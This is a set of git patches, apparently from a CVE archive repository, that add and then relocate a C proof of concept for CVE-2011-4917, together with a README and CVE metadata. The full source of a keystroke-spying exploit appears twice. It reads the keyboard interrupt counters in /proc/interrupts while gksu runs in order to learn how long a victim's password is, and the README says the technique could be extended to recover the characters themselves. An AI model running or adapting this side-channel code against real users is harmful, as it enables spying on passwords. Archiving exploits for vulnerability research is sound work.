a/cve/linux-kernel/2011/CVE-2011-4917/CVE-2011-4917/CVE-2011-4917/.keep b/cve/linux-kernel/2011/CVE-2011-4917/CVE-2011-4917/CVE-2011-4917/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From 18db97dcfc39b356cb4739f57b25caf7e995a9de Mon Sep 17 00:00:00 2001 From: KunWang Date: Mon, 10 Apr 2023 08:43:12 +0000 Subject: [PATCH 17/26] =?UTF-8?q?add=20cve/linux-kernel/2011/CVE-2011-4917?= =?UTF-8?q?/CVE-2011-4917/CVE-2011-4917/CVE-2011-4917.c.=20=E6=BC=8F?= =?UTF-8?q?=E6=B4=9E=E5=88=A9=E7=94=A8=E4=BB=A3=E7=A0=81?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: KunWang --- .../CVE-2011-4917/CVE-2011-4917.c | 178 ++++++++++++++++++ 1 file changed, 178 insertions(+) create mode 100644 cve/linux-kernel/2011/CVE-2011-4917/CVE-2011-4917/CVE-2011-4917/CVE-2011-4917.c diff --git a/cve/linux-kernel/2011/CVE-2011-4917/CVE-2011-4917/CVE-2011-4917/CVE-2011-4917.c b/cve/linux-kernel/2011/CVE-2011-4917/CVE-2011-4917/CVE-2011-4917/CVE-2011-4917.c new file mode 100644 index 00000000..949781c2 --- /dev/null +++ b/cve/linux-kernel/2011/CVE-2011-4917/CVE-2011-4917/CVE-2011-4917/CVE-2011-4917.c @@ -0,0 +1,178 @@ +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + + +int i8042_number; +int ints[1024], ints_prev[1024], ints_delta[1024]; + +char buffer[1024]; + +int reread_ints(int *interrupts, int int_count, char **names) +{ + int i; + int n, c1, c2; + char s1[1024], s2[1024]; + + int interrupts_fd; + FILE *interrupts_file; + + interrupts_fd = open("/proc/interrupts", O_RDONLY); + if (interrupts_fd == -1) + err(1, "open(\"/proc/interrupts\")"); + + interrupts_file = fdopen(interrupts_fd, "r"); + if (interrupts_file == NULL) + err(1, "fdopen"); + + if (fseek(interrupts_file, 0, SEEK_SET) < 0) + err(1, "lseek"); + + fgets(buffer, sizeof(buffer), interrupts_file); + + for (i = 0; i < int_count; i++) { + if (fgets(buffer, sizeof(buffer), interrupts_file) == NULL) { + fclose(interrupts_file); + return i; + } + + if (sscanf(buffer, "%d: %d %d %s %s", &n, &c1, &c2, s1, s2) < 3) { + fclose(interrupts_file); + return i; + } + + if (names != NULL && names[i] == NULL) + names[i] = strdup(s2); + + interrupts[i] = c1 + c2; + } + + fclose(interrupts_file); + return int_count; +} + +void init_i8042_number(void) +{ + int i; + int can_be_keyboard[1024]; + char *names[1024]; + int number_of_interrups, can_be_keyboard_numbers; + + number_of_interrups = reread_ints(ints_prev, sizeof(ints_prev), names); + + /* + * Identify the i8042 interrupt associated with the keyboard by: + * 1) name should be i8042 + * 2) interrupts count emitted in one second shouldn't be more than 100 + */ + for (i = 0; i < number_of_interrups; i++) + can_be_keyboard[i] = strcmp(names[i], "i8042") == 0; + + while (1) { + sleep(1); + reread_ints(ints, sizeof(ints), NULL); + + can_be_keyboard_numbers = 0; + for (i = 0; i < number_of_interrups; i++) { + can_be_keyboard[i] &= (ints[i] - ints_prev[i]) < 100; + if (can_be_keyboard[i]) + can_be_keyboard_numbers++; + + ints_prev[i] = ints[i]; + } + + if (can_be_keyboard_numbers == 1) { + for (i = 0; i < number_of_interrups; i++) + if (can_be_keyboard[i]) { + i8042_number = i; + printf("i8042 keyboard is #%d\n", i); + return; + } + } + } +} + +int i8042_read(void) +{ + reread_ints(ints, sizeof(ints), NULL); + ints_prev[i8042_number] = ints[i8042_number]; + + return ints[i8042_number]; +} + +int wait_for_program(char *pname) +{ + FILE *f; + int pid; + char s[1024]; + + snprintf(s, sizeof(s), "while :; do pgrep %s >/dev/null && break;" + " sleep 0.1; done", pname); + system(s); + snprintf(s, sizeof(s), "pgrep %s", pname); + f = popen(s, "r"); + if (f == NULL) + err(1, "popen"); + + if (fgets(buffer, sizeof(buffer), f) == NULL) + err(1, "fgets"); + + if (sscanf(buffer, "%d", &pid) < 1) + err(1, "sscanf"); + + pclose(f); + + return pid; +} + +int main(int argc, char *argv[]) +{ + int n, old, sum, i; + int pid; + char *pname = argv[1]; + + if (argc < 2) + errx(1, "usage: spy-interrupts gksu"); + + puts("Waiting for mouse activity..."); + init_i8042_number(); + + pid = wait_for_program(pname); + printf("%s is %d\n", pname, pid); + + old = i8042_read(); + + sum = 0; + + while (1) { + n = i8042_read(); + if (old == n) + usleep(10000); + else { + for (i = 0; i < n-old; i++) + putchar('.'); + fflush(stdout); + } + + sum += n - old; + old = n; + + if (kill(pid, 0) < 0 && errno == ESRCH) + break; + } + + /* + * #interrupts == 2 * #keystrokes. + * #keystrokes = len(password) - 1 because of ENTER after the password. + */ + printf("\n%d keystrokes\n", (sum-2)/2); + + return 0; +} \ No newline at end of file -- Gitee From 15b8506bc5b13cc97976e1c4acc0090fde0ae836 Mon Sep 17 00:00:00 2001 From: KunWang Date: Mon, 10 Apr 2023 08:50:24 +0000 Subject: [PATCH 18/26] =?UTF-8?q?add=20cve/linux-kernel/2011/CVE-2011-4917?= =?UTF-8?q?/CVE-2011-4917/README.md.=20CVE-2011-4917=E6=BC=8F=E6=B4=9E?= =?UTF-8?q?=E6=8F=8F=E8=BF=B0?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: KunWang --- .../2011/CVE-2011-4917/CVE-2011-4917/README.md | 14 ++++++++++++++ 1 file changed, 14 insertions(+) create mode 100644 cve/linux-kernel/2011/CVE-2011-4917/CVE-2011-4917/README.md diff --git a/cve/linux-kernel/2011/CVE-2011-4917/CVE-2011-4917/README.md b/cve/linux-kernel/2011/CVE-2011-4917/CVE-2011-4917/README.md new file mode 100644 index 00000000..d95ca27d --- /dev/null +++ b/cve/linux-kernel/2011/CVE-2011-4917/CVE-2011-4917/README.md @@ -0,0 +1,14 @@ +A PoC for spying for keystrokes in gksu via /proc/interrupts in Linux <= 3.1. +In the Linux kernel through 3.1 there is an information disclosure issue via /proc/stat. + +The file /proc/interrupts is world readable. It contains information about how many interrupts were emitted since the system boot. We may loop on one CPU core while the victim is executed on another, and learn the length of victim's passord via monitoring emitted interrupts' counters of the keyboard interrupt. The PoC counts only keystrokes number, but it can be easily extended to note the delays between the keystrokes and do the statistical analysis to learn the precise input characters. + +The limitations: + - it works on 2-core CPUs only. + - it works on 1-keyboard systems only. + - it doesn't carefully count the first and last keystrokes (e.g. ENTER after the password input). + - it doesn't carefully filter keystrokes after ENTER. + +run as: gcc -Wall spy-interrupts.c -o spy-interrupts && ./spy-interrupts gksu + +P.S. The harm of 0444 /proc/interrupts is known for a long time, but I was told about this specific attack vector by Tavis Ormandy just after similar PoC spy-sched was published. \ No newline at end of file -- Gitee From 25b76a7f295e3958ee348a886d3e1f0f80d4d12c Mon Sep 17 00:00:00 2001 From: KunWang Date: Mon, 10 Apr 2023 08:50:38 +0000 Subject: [PATCH 19/26] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/linux-kernel/2011/CVE-2011-4917/CVE-2011-4917/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/linux-kernel/2011/CVE-2011-4917/CVE-2011-4917/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/linux-kernel/2011/CVE-2011-4917/CVE-2011-4917/.keep diff --git a/cve/linux-kernel/2011/CVE-2011-4917/CVE-2011-4917/.keep b/cve/linux-kernel/2011/CVE-2011-4917/CVE-2011-4917/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From 77b2c7bac5ae4ea36a8d832e2ffc8ee2485c4734 Mon Sep 17 00:00:00 2001 From: KunWang Date: Mon, 10 Apr 2023 08:51:34 +0000 Subject: [PATCH 20/26] =?UTF-8?q?add=20cve/linux-kernel/2011/CVE-2011-4917?= =?UTF-8?q?/CVE-2011-4917/CVE-2011-4917/README.md.=20CVE-2011-4917?= =?UTF-8?q?=E6=BC=8F=E6=B4=9E=E6=8F=8F=E8=BF=B0?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: KunWang --- .../CVE-2011-4917/CVE-2011-4917/README.md | 14 ++++++++++++++ 1 file changed, 14 insertions(+) create mode 100644 cve/linux-kernel/2011/CVE-2011-4917/CVE-2011-4917/CVE-2011-4917/README.md diff --git a/cve/linux-kernel/2011/CVE-2011-4917/CVE-2011-4917/CVE-2011-4917/README.md b/cve/linux-kernel/2011/CVE-2011-4917/CVE-2011-4917/CVE-2011-4917/README.md new file mode 100644 index 00000000..d95ca27d --- /dev/null +++ b/cve/linux-kernel/2011/CVE-2011-4917/CVE-2011-4917/CVE-2011-4917/README.md @@ -0,0 +1,14 @@ +A PoC for spying for keystrokes in gksu via /proc/interrupts in Linux <= 3.1. +In the Linux kernel through 3.1 there is an information disclosure issue via /proc/stat. + +The file /proc/interrupts is world readable. It contains information about how many interrupts were emitted since the system boot. We may loop on one CPU core while the victim is executed on another, and learn the length of victim's passord via monitoring emitted interrupts' counters of the keyboard interrupt. The PoC counts only keystrokes number, but it can be easily extended to note the delays between the keystrokes and do the statistical analysis to learn the precise input characters. + +The limitations: + - it works on 2-core CPUs only. + - it works on 1-keyboard systems only. + - it doesn't carefully count the first and last keystrokes (e.g. ENTER after the password input). + - it doesn't carefully filter keystrokes after ENTER. + +run as: gcc -Wall spy-interrupts.c -o spy-interrupts && ./spy-interrupts gksu + +P.S. The harm of 0444 /proc/interrupts is known for a long time, but I was told about this specific attack vector by Tavis Ormandy just after similar PoC spy-sched was published. \ No newline at end of file -- Gitee From 195af5317d4fffbda0fde2574ec4afb72d5fb8f5 Mon Sep 17 00:00:00 2001 From: KunWang Date: Mon, 10 Apr 2023 08:51:43 +0000 Subject: [PATCH 21/26] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/linux-kernel/2011/CVE-2011-4917/CVE-2011-4917/CVE-2011-4917/.?= =?UTF-8?q?keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../2011/CVE-2011-4917/CVE-2011-4917/CVE-2011-4917/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/linux-kernel/2011/CVE-2011-4917/CVE-2011-4917/CVE-2011-4917/.keep diff --git a/cve/linux-kernel/2011/CVE-2011-4917/CVE-2011-4917/CVE-2011-4917/.keep b/cve/linux-kernel/2011/CVE-2011-4917/CVE-2011-4917/CVE-2011-4917/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From 20ebd8a122880144e86293c9272a25c0bcf8bcab Mon Sep 17 00:00:00 2001 From: KunWang Date: Mon, 10 Apr 2023 09:02:22 +0000 Subject: [PATCH 22/26] add cve/linux-kernel/2011/CVE-2011-4917/CVE-2011-4917/CVE-2011-4917.yaml. Signed-off-by: KunWang --- .../CVE-2011-4917/CVE-2011-4917.yaml | 19 +++++++++++++++++++ 1 file changed, 19 insertions(+) create mode 100644 cve/linux-kernel/2011/CVE-2011-4917/CVE-2011-4917/CVE-2011-4917.yaml diff --git a/cve/linux-kernel/2011/CVE-2011-4917/CVE-2011-4917/CVE-2011-4917.yaml b/cve/linux-kernel/2011/CVE-2011-4917/CVE-2011-4917/CVE-2011-4917.yaml new file mode 100644 index 00000000..e3bb0b40 --- /dev/null +++ b/cve/linux-kernel/2011/CVE-2011-4917/CVE-2011-4917/CVE-2011-4917.yaml @@ -0,0 +1,19 @@ +id: CVE-2011-4917 +source: +https://www.openwall.com/lists/oss-security/2011/11/07/9 +info: +name: Linux内核是一个自由和开源的、单片的、模块化的、多任务的、类似Unix的操作系统内核。它最初是由Linus Torvalds在1991年为他的基于i386的PC编写的,它很快就被采纳为GNU操作系统的内核,GNU被写成一个自由(liber)的Unix替代品。 +severity: medium +description: 在3.1版本的Linux内核中,存在一个通过/proc/stat的信息泄露问题。 +scope-of-influence: + Linux kernel <= 3.1 +reference: +- https://nvd.nist.gov/vuln/detail/cve-2011-4917 +classification: +cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N +cvss-score: 5.5 +cve-id: CVE-2011-4917 +cwe-id: CWE-200 +cnvd-id: None +kve-id: None +tags: information disclosure \ No newline at end of file -- Gitee From 50fe4a883db29c5e4e6496d97d5acd42109d772b Mon Sep 17 00:00:00 2001 From: KunWang Date: Mon, 10 Apr 2023 09:02:46 +0000 Subject: [PATCH 23/26] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/linux-kernel/2011/CVE-2011-4917/CVE-2011-4917/CVE-2011-4917.c?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../CVE-2011-4917/CVE-2011-4917.c | 178 ------------------ 1 file changed, 178 deletions(-) delete mode 100644 cve/linux-kernel/2011/CVE-2011-4917/CVE-2011-4917/CVE-2011-4917.c diff --git a/cve/linux-kernel/2011/CVE-2011-4917/CVE-2011-4917/CVE-2011-4917.c b/cve/linux-kernel/2011/CVE-2011-4917/CVE-2011-4917/CVE-2011-4917.c deleted file mode 100644 index bab4fad3..00000000 --- a/cve/linux-kernel/2011/CVE-2011-4917/CVE-2011-4917/CVE-2011-4917.c +++ /dev/null @@ -1,178 +0,0 @@ -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include - - -int i8042_number; -int ints[1024], ints_prev[1024], ints_delta[1024]; - -char buffer[1024]; - -int reread_ints(int *interrupts, int int_count, char **names) -{ - int i; - int n, c1, c2; - char s1[1024], s2[1024]; - - int interrupts_fd; - FILE *interrupts_file; - - interrupts_fd = open("/proc/interrupts", O_RDONLY); - if (interrupts_fd == -1) - err(1, "open(\"/proc/interrupts\")"); - - interrupts_file = fdopen(interrupts_fd, "r"); - if (interrupts_file == NULL) - err(1, "fdopen"); - - if (fseek(interrupts_file, 0, SEEK_SET) < 0) - err(1, "lseek"); - - fgets(buffer, sizeof(buffer), interrupts_file); - - for (i = 0; i < int_count; i++) { - if (fgets(buffer, sizeof(buffer), interrupts_file) == NULL) { - fclose(interrupts_file); - return i; - } - - if (sscanf(buffer, "%d: %d %d %s %s", &n, &c1, &c2, s1, s2) < 3) { - fclose(interrupts_file); - return i; - } - - if (names != NULL && names[i] == NULL) - names[i] = strdup(s2); - - interrupts[i] = c1 + c2; - } - - fclose(interrupts_file); - return int_count; -} - -void init_i8042_number(void) -{ - int i; - int can_be_keyboard[1024]; - char *names[1024]; - int number_of_interrups, can_be_keyboard_numbers; - - number_of_interrups = reread_ints(ints_prev, sizeof(ints_prev), names); - - /* - * Identify the i8042 interrupt associated with the keyboard by: - * 1) name should be i8042 - * 2) interrupts count emitted in one second shouldn't be more than 100 - */ - for (i = 0; i < number_of_interrups; i++) - can_be_keyboard[i] = strcmp(names[i], "i8042") == 0; - - while (1) { - sleep(1); - reread_ints(ints, sizeof(ints), NULL); - - can_be_keyboard_numbers = 0; - for (i = 0; i < number_of_interrups; i++) { - can_be_keyboard[i] &= (ints[i] - ints_prev[i]) < 100; - if (can_be_keyboard[i]) - can_be_keyboard_numbers++; - - ints_prev[i] = ints[i]; - } - - if (can_be_keyboard_numbers == 1) { - for (i = 0; i < number_of_interrups; i++) - if (can_be_keyboard[i]) { - i8042_number = i; - printf("i8042 keyboard is #%d\n", i); - return; - } - } - } -} - -int i8042_read(void) -{ - reread_ints(ints, sizeof(ints), NULL); - ints_prev[i8042_number] = ints[i8042_number]; - - return ints[i8042_number]; -} - -int wait_for_program(char *pname) -{ - FILE *f; - int pid; - char s[1024]; - - snprintf(s, sizeof(s), "while :; do pgrep %s >/dev/null && break;" - " sleep 0.1; done", pname); - system(s); - snprintf(s, sizeof(s), "pgrep %s", pname); - f = popen(s, "r"); - if (f == NULL) - err(1, "popen"); - - if (fgets(buffer, sizeof(buffer), f) == NULL) - err(1, "fgets"); - - if (sscanf(buffer, "%d", &pid) < 1) - err(1, "sscanf"); - - pclose(f); - - return pid; -} - -int main(int argc, char *argv[]) -{ - int n, old, sum, i; - int pid; - char *pname = argv[1]; - - if (argc < 2) - errx(1, "usage: spy-interrupts gksu"); - - puts("Waiting for mouse activity..."); - init_i8042_number(); - - pid = wait_for_program(pname); - printf("%s is %d\n", pname, pid); - - old = i8042_read(); - - sum = 0; - - while (1) { - n = i8042_read(); - if (old == n) - usleep(10000); - else { - for (i = 0; i < n-old; i++) - putchar('.'); - fflush(stdout); - } - - sum += n - old; - old = n; - - if (kill(pid, 0) < 0 && errno == ESRCH) - break; - } - - /* - * #interrupts == 2 * #keystrokes. - * #keystrokes = len(password) - 1 because of ENTER after the password. - */ - printf("\n%d keystrokes\n", (sum-2)/2); - - return 0; -} \ No newline at end of file -- Gitee From 155f5d1f0dde8b89a6dcfad64584ded8a3839f96 Mon Sep 17 00:00:00 2001 From: KunWang Date: Mon, 10 Apr 2023 09:03:03 +0000 Subject: [PATCH 24/26] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/linux-kernel/2011/CVE-2011-4917/CVE-2011-4917/README.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../2011/CVE-2011-4917/CVE-2011-4917/README.md | 14 -------------- 1 file changed, 14 deletions(-) delete mode 100644 cve/linux-kernel/2011/CVE-2011-4917/CVE-2011-4917/README.md diff --git a/cve/linux-kernel/2011/CVE-2011-4917/CVE-2011-4917/README.md b/cve/linux-kernel/2011/CVE-2011-4917/CVE-2011-4917/README.md deleted file mode 100644 index d95ca27d..00000000 --- a/cve/linux-kernel/2011/CVE-2011-4917/CVE-2011-4917/README.md +++ /dev/null @@ -1,14 +0,0 @@ -A PoC for spying for keystrokes in gksu via /proc/interrupts in Linux <= 3.1. -In the Linux kernel through 3.1 there is an information disclosure issue via /proc/stat. - -The file /proc/interrupts is world readable. It contains information about how many interrupts were emitted since the system boot. We may loop on one CPU core while the victim is executed on another, and learn the length of victim's passord via monitoring emitted interrupts' counters of the keyboard interrupt. The PoC counts only keystrokes number, but it can be easily extended to note the delays between the keystrokes and do the statistical analysis to learn the precise input characters. - -The limitations: - - it works on 2-core CPUs only. - - it works on 1-keyboard systems only. - - it doesn't carefully count the first and last keystrokes (e.g. ENTER after the password input). - - it doesn't carefully filter keystrokes after ENTER. - -run as: gcc -Wall spy-interrupts.c -o spy-interrupts && ./spy-interrupts gksu - -P.S. The harm of 0444 /proc/interrupts is known for a long time, but I was told about this specific attack vector by Tavis Ormandy just after similar PoC spy-sched was published. \ No newline at end of file -- Gitee From b3be1727ea38b4af380496d96a10a5e4df7f04a2 Mon Sep 17 00:00:00 2001 From: KunWang Date: Mon, 10 Apr 2023 09:15:49 +0000 Subject: [PATCH 25/26] update cve/linux-kernel/2011/CVE-2011-4917/CVE-2011-4917/CVE-2011-4917.yaml. Signed-off-by: KunWang --- .../CVE-2011-4917/CVE-2011-4917.yaml | 33 +++++++++---------- 1 file changed, 16 insertions(+), 17 deletions(-) diff --git a/cve/linux-kernel/2011/CVE-2011-4917/CVE-2011-4917/CVE-2011-4917.yaml b/cve/linux-kernel/2011/CVE-2011-4917/CVE-2011-4917/CVE-2011-4917.yaml index e3bb0b40..5dc48de9 100644 --- a/cve/linux-kernel/2011/CVE-2011-4917/CVE-2011-4917/CVE-2011-4917.yaml +++ b/cve/linux-kernel/2011/CVE-2011-4917/CVE-2011-4917/CVE-2011-4917.yaml @@ -1,19 +1,18 @@ id: CVE-2011-4917 -source: -https://www.openwall.com/lists/oss-security/2011/11/07/9 +source: https://www.openwall.com/lists/oss-security/2011/11/07/9 info: -name: Linux内核是一个自由和开源的、单片的、模块化的、多任务的、类似Unix的操作系统内核。它最初是由Linus Torvalds在1991年为他的基于i386的PC编写的,它很快就被采纳为GNU操作系统的内核,GNU被写成一个自由(liber)的Unix替代品。 -severity: medium -description: 在3.1版本的Linux内核中,存在一个通过/proc/stat的信息泄露问题。 -scope-of-influence: - Linux kernel <= 3.1 -reference: -- https://nvd.nist.gov/vuln/detail/cve-2011-4917 -classification: -cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N -cvss-score: 5.5 -cve-id: CVE-2011-4917 -cwe-id: CWE-200 -cnvd-id: None -kve-id: None -tags: information disclosure \ No newline at end of file + name: Linux内核是一个自由和开源的、单片的、模块化的、多任务的、类似Unix的操作系统内核。它最初是由Linus Torvalds在1991年为他的基于i386的PC编写的,它很快就被采纳为GNU操作系统的内核,GNU被写成一个自由(liber)的Unix替代品。 + severity: medium + description: 在3.1版本的Linux内核中,存在一个通过/proc/stat的信息泄露问题。 + scope-of-influence: + Linux kernel <= 3.1 + reference: + - https://nvd.nist.gov/vuln/detail/cve-2011-4917 + classification: + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N + cvss-score: 5.5 + cve-id: CVE-2011-4917 + cwe-id: CWE-200 + cnvd-id: None + kve-id: None + tags: information disclosure \ No newline at end of file -- Gitee From eb53a3a67a3ce2341ddfbadd9da009f5648c1514 Mon Sep 17 00:00:00 2001 From: KunWang Date: Mon, 10 Apr 2023 09:19:16 +0000 Subject: [PATCH 26/26] update other_list.yaml. Signed-off-by: KunWang --- other_list.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/other_list.yaml b/other_list.yaml index c02895cc..57d43e26 100644 --- a/other_list.yaml +++ b/other_list.yaml @@ -14,6 +14,7 @@ cve: - CVE-2020-27194 - CVE-2023-0179 - CVE-2018-18955 + - CVE-2011-4917 polkit: - CVE-2021-3560 Outlook: -- Gitee